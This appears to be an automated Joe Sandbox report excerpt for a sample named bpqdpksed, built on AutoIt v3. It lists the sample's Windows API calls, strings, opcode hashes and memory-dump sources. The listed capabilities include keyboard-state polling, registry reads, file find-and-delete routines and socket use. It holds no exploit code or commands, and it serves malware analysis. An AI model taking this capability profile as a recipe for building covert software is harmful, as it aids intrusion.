                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,00D6B0DE,?,?,00000000,?,00D66B73,?), ref: 00D7F156
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 48df392e78e747d3877410df2e946631b57610b10f95903c7088f13aa3575471
                                                                                              • Instruction ID: 2eb8ed4153be78bde4b2435a287fa5e3cef467471152c5634f39bac6e7691645
                                                                                              • Opcode Fuzzy Hash: 48df392e78e747d3877410df2e946631b57610b10f95903c7088f13aa3575471
                                                                                              • Instruction Fuzzy Hash: 69E092B5910704AFD728DF55D846DA7BBF8EB08310B00455EA85693740E7B1BD44CB60
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D639FD
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 541455249-0
                                                                                              • Opcode ID: 2fb1d7e33c5d2cbc7db8e0114cc92ac80132eaecc5bc51b96a34f3f0f68c6b6c
                                                                                              • Instruction ID: 2a26dcd2a8d78270f675efa82cb52f6e10adfbd81f11026fc8e61f483a678575
                                                                                              • Opcode Fuzzy Hash: 2fb1d7e33c5d2cbc7db8e0114cc92ac80132eaecc5bc51b96a34f3f0f68c6b6c
                                                                                              • Instruction Fuzzy Hash: D7E0C272A002245BCB20A29C9C0AFEA77EEDFC8790F0441B1FC09D7248DDA4ED80D6B4
                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00DCE76C
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2987691875-0
                                                                                              • Opcode ID: 716de649cf0f3be330ec8e99c883b14f4c50acf0aa7f172485dba00bb99934d9
                                                                                              • Instruction ID: 4fb71fd0093184c567f4ca1f2de931084f81136ae07232f6b6b25ae1300f0996
                                                                                              • Opcode Fuzzy Hash: 716de649cf0f3be330ec8e99c883b14f4c50acf0aa7f172485dba00bb99934d9
                                                                                              • Instruction Fuzzy Hash: F3D05EA19003282BDF60A6749C0DDB73AADC740214F0046A0786DD3242ED34ED4486B0
                                                                                              APIs
                                                                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00DCD9DC,?,?), ref: 00DCDA72
Memory Dump Source
• Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
Similarity
• API ID: CopyFile
• String ID:
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00DA0AA4,?,?,00000000,?,00DA0AA4,00000000,0000000C), ref: 00DA0757
Similarity
• API ID: CreateFile
• String ID:
APIs
• GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
Similarity
• API ID: AttributesFile
• String ID:
APIs
  • Part of subcall function 00DCDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00DCDBE0
  • Part of subcall function 00DCDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00DCDC30
  • Part of subcall function 00DCDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00DCDC41
  • Part of subcall function 00DCDB69: FindClose.KERNEL32(00000000), ref: 00DCDC58
• GetLastError.KERNEL32 ref: 00DD6583
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
APIs
• CloseHandle.KERNELBASE(?,?,00000000,00DA3A1C), ref: 00D67973
Similarity
• API ID: CloseHandle
• String ID:
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00DDA11B
• FindNextFileW.KERNEL32(00000000,?), ref: 00DDA176
• FindClose.KERNEL32(00000000), ref: 00DDA181
• FindFirstFileW.KERNEL32(*.*,?), ref: 00DDA19D
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DDA1ED
• SetCurrentDirectoryW.KERNEL32(00E27B94), ref: 00DDA20B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDA215
• FindClose.KERNEL32(00000000), ref: 00DDA222
• FindClose.KERNEL32(00000000), ref: 00DDA232
  • Part of subcall function 00DCE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DCE2C9
Strings
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
APIs
  • Part of subcall function 00DED2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DEC00D,?,?), ref: 00DED314
  • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED350
  • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3C7
  • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3FD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DEC89D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00DEC908
• RegCloseKey.ADVAPI32(00000000), ref: 00DEC92C
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DEC98B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DECA46
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DECAB3
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DECB48
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00DECB99
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00DECC42
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DECCE1
• RegCloseKey.ADVAPI32(00000000), ref: 00DECCEE
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
APIs
• GetKeyboardState.USER32(?), ref: 00DCA572
• GetAsyncKeyState.USER32(000000A0), ref: 00DCA5F3
• GetKeyState.USER32(000000A0), ref: 00DCA60E
• GetAsyncKeyState.USER32(000000A1), ref: 00DCA628
• GetKeyState.USER32(000000A1), ref: 00DCA63D
• GetAsyncKeyState.USER32(00000011), ref: 00DCA655
• GetKeyState.USER32(00000011), ref: 00DCA667
• GetAsyncKeyState.USER32(00000012), ref: 00DCA67F
• GetKeyState.USER32(00000012), ref: 00DCA691
• GetAsyncKeyState.USER32(0000005B), ref: 00DCA6A9
• GetKeyState.USER32(0000005B), ref: 00DCA6BB
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
• CoInitialize.OLE32 ref: 00DE40D1
• CoUninitialize.OLE32 ref: 00DE40DC
• CoCreateInstance.OLE32(?,00000000,00000017,00E00B44,?), ref: 00DE4136
• IIDFromString.OLE32(?,?), ref: 00DE41A9
• VariantInit.OLEAUT32(?), ref: 00DE4241
• VariantClear.OLEAUT32(?), ref: 00DE4293
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
APIs
  • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DDA4D5
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DDA5E8
  • Part of subcall function 00DD41CE: GetInputState.USER32 ref: 00DD4225
  • Part of subcall function 00DD41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD42C0
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DDA505
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DDA5D2
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
APIs
• DefDlgProcW.USER32(?,?), ref: 00D622EE
• GetSysColor.USER32(0000000F), ref: 00D623C3
• SetBkColor.GDI32(?,00000000), ref: 00D623D6
Similarity
• API ID: Color$Proc
• String ID:
APIs
  • Part of subcall function 00DE39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DE39D7
  • Part of subcall function 00DE39AB: _wcslen.LIBCMT ref: 00DE39F8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DE21BA
• WSAGetLastError.WSOCK32 ref: 00DE21E1
• bind.WSOCK32(00000000,?,00000010), ref: 00DE2238
• WSAGetLastError.WSOCK32 ref: 00DE2243
• closesocket.WSOCK32(00000000), ref: 00DE2272
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
APIs
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00DCEC19
Similarity
• API ID: mouse_event
• String ID: DOWN
APIs
• CharUpperBuffW.USER32(?,?), ref: 00DF0C44
• _wcslen.LIBCMT ref: 00DF0C7E
• _wcslen.LIBCMT ref: 00DF0CE8
• _wcslen.LIBCMT ref: 00DF0D50
• _wcslen.LIBCMT ref: 00DF0DD4
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DF0E24
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DF0E63
  • Part of subcall function 00D7FD60: _wcslen.LIBCMT ref: 00D7FD6B
  • Part of subcall function 00DC2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC2AE8
  • Part of subcall function 00DC2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DC2B1A
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D6259A
• GetSystemMetrics.USER32(00000007), ref: 00D625A2
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D625CD
• GetSystemMetrics.USER32(00000008), ref: 00D625D5
• GetSystemMetrics.USER32(00000004), ref: 00D625FA
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D62617
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D62627
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D6265A
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D6266E
• GetClientRect.USER32(00000000,000000FF), ref: 00D6268C
• GetStockObject.GDI32(00000011), ref: 00D626A8
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00D626B3
  • Part of subcall function 00D619CD: GetCursorPos.USER32(?), ref: 00D619E1
  • Part of subcall function 00D619CD: ScreenToClient.USER32(00000000,?), ref: 00D619FE
  • Part of subcall function 00D619CD: GetAsyncKeyState.USER32(00000001), ref: 00D61A23
  • Part of subcall function 00D619CD: GetAsyncKeyState.USER32(00000002), ref: 00D61A3D
• SetTimer.USER32(00000000,00000000,00000028,00D6199C), ref: 00D626DA
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
APIs
• _wcslen.LIBCMT ref: 00DF8CB9
• _wcslen.LIBCMT ref: 00DF8CCD
• _wcslen.LIBCMT ref: 00DF8CF0
• _wcslen.LIBCMT ref: 00DF8D13
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DF8D51
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DF6551), ref: 00DF8DAD
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DF8DE6
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DF8E29
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DF8E60
• FreeLibrary.KERNEL32(?), ref: 00DF8E6C
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DF8E7C
• DestroyIcon.USER32(?,?,?,?,?,00DF6551), ref: 00DF8E8B
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DF8EA8
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DF8EB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 799131459-1154884017
                                                                                              • Opcode ID: 3bc414772bdd7856b714ef0719d6956cde6c8e28804e9194efc8036536dfa8ed
                                                                                              • Instruction ID: 9dd2f0b8c87c81add2c2af9ad7069d7f879e0408ae432b30b391f265c423ad45
                                                                                              • Opcode Fuzzy Hash: 3bc414772bdd7856b714ef0719d6956cde6c8e28804e9194efc8036536dfa8ed
                                                                                              • Instruction Fuzzy Hash: AF61BE71A00219BEEB14DF64DC45BBE77A8FF08710F148506FA15DA1D1DBB59A80DBB0
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00DD4852
                                                                                              • _wcslen.LIBCMT ref: 00DD485D
                                                                                              • _wcslen.LIBCMT ref: 00DD48B4
                                                                                              • _wcslen.LIBCMT ref: 00DD48F2
                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00DD4930
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD4978
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD49B3
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DD49E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 1839972693-4113822522
                                                                                              • Opcode ID: 9eb1c93307a78ca4c22a7d5fddc272fb87010e92ec8ccd518c3d69702118d18f
                                                                                              • Instruction ID: 8666b6c72e56f47376ae4cc2576ea97e361f613f8bfc7a0cd225ebf908a87b45
                                                                                              • Opcode Fuzzy Hash: 9eb1c93307a78ca4c22a7d5fddc272fb87010e92ec8ccd518c3d69702118d18f
                                                                                              • Instruction Fuzzy Hash: BC719C326082129FC710EF24C89186AB7E5EF98768F04492EF89697361EB31DD45CBB1
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 00DC62BD
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DC62CF
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DC62E6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00DC62FB
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00DC6301
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00DC6311
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00DC6317
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DC6338
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DC6352
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DC635B
                                                                                              • _wcslen.LIBCMT ref: 00DC63C2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DC63FE
                                                                                              • GetDesktopWindow.USER32 ref: 00DC6404
                                                                                              • GetWindowRect.USER32(00000000), ref: 00DC640B
                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DC6462
                                                                                              • GetClientRect.USER32(?,?), ref: 00DC646F
                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DC6494
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DC64BE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 895679908-0
                                                                                              • Opcode ID: b1a0fca779654a9260e808c573c47724420a9606a440c420a07ccdff413ca9ac
                                                                                              • Instruction ID: e81d86847aa8ba656e9aaebc01ba1a0ab384f2b6617460937db3383a5a5c2a20
                                                                                              • Opcode Fuzzy Hash: b1a0fca779654a9260e808c573c47724420a9606a440c420a07ccdff413ca9ac
                                                                                              • Instruction Fuzzy Hash: 7A71493190070AAFDB209FA8CE45FAEBBF6EB48705F14451CE586A36A0D775E944CB20
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00DE0784
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00DE078F
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00DE079A
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00DE07A5
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00DE07B0
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00DE07BB
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00DE07C6
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00DE07D1
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00DE07DC
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00DE07E7
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00DE07F2
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00DE07FD
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00DE0808
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00DE0813
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00DE081E
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00DE0829
                                                                                              • GetCursorInfo.USER32(?), ref: 00DE0839
                                                                                              • GetLastError.KERNEL32 ref: 00DE087B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: a4d316d20c2063fd0c60a03472023db195fd31e8075b025670b052bf7a04525a
                                                                                              • Instruction ID: 0723e97e6be87baf844ebfaaae5c5b6beec4ab5fb7233353d91dc965b989ec0d
                                                                                              • Opcode Fuzzy Hash: a4d316d20c2063fd0c60a03472023db195fd31e8075b025670b052bf7a04525a
                                                                                              • Instruction Fuzzy Hash: 80417470D083596BDB10AFBA8CC585EBFE8FF04354B54452AE11CE7291DA78E841CFA0
                                                                                              APIs
                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D80456
                                                                                                • Part of subcall function 00D8047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E3170C,00000FA0,179ED815,?,?,?,?,00DA2753,000000FF), ref: 00D804AC
                                                                                                • Part of subcall function 00D8047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DA2753,000000FF), ref: 00D804B7
                                                                                                • Part of subcall function 00D8047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DA2753,000000FF), ref: 00D804C8
                                                                                                • Part of subcall function 00D8047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D804DE
                                                                                                • Part of subcall function 00D8047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D804EC
                                                                                                • Part of subcall function 00D8047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D804FA
                                                                                                • Part of subcall function 00D8047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D80525
                                                                                                • Part of subcall function 00D8047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D80530
                                                                                              • ___scrt_fastfail.LIBCMT ref: 00D80477
                                                                                                • Part of subcall function 00D80433: __onexit.LIBCMT ref: 00D80439
                                                                                              Strings
                                                                                              • SleepConditionVariableCS, xrefs: 00D804E4
                                                                                              • WakeAllConditionVariable, xrefs: 00D804F2
                                                                                              • InitializeConditionVariable, xrefs: 00D804D8
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D804B2
                                                                                              • kernel32.dll, xrefs: 00D804C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                               • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 66158676-1714406822
                                                                                              • Opcode ID: 5b865c3ae08e9015398e7c1642a2850c307cbcb30771f17d23d2fef86557f8bd
                                                                                              • Instruction ID: 7695daf0dff8cbcb8def33007fd54e7d16a79da4c8b045e243828a87ecdabf20
                                                                                              • Opcode Fuzzy Hash: 5b865c3ae08e9015398e7c1642a2850c307cbcb30771f17d23d2fef86557f8bd
                                                                                              • Instruction Fuzzy Hash: D821F932A443056FD7507BA8AC09B293FD9EB06F61F054159F901E62D0DFB09C48CB71
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00DFDCD0), ref: 00DE4A18
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00DE4A2A
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00DFDCD0), ref: 00DE4A4F
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00DFDCD0), ref: 00DE4A9B
                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00DFDCD0), ref: 00DE4B05
                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00DE4BBF
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DE4C25
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00DE4C4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
